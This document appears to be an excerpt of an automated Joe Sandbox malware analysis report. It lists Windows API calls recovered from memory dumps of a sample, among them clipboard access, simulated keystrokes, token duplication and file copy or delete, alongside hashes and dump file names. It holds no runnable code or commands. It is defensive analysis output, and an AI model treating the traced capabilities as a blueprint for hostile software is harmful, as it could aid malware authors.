                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 04938683
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wfsopen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 197181222-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0493A079
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0493A079
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00A67998,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_BeginDrag.COMCTL32(00A67998,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,009C1A48,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,009C1A48,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3100379633-4164748364
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2889586943-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00446498
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $@OH$default$winsta0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3324942560-3791954436
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 15083398-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BD94
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BE83
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BE95
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2188072990-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                                                                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                                                                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                                                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004789D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A79
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478B03
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
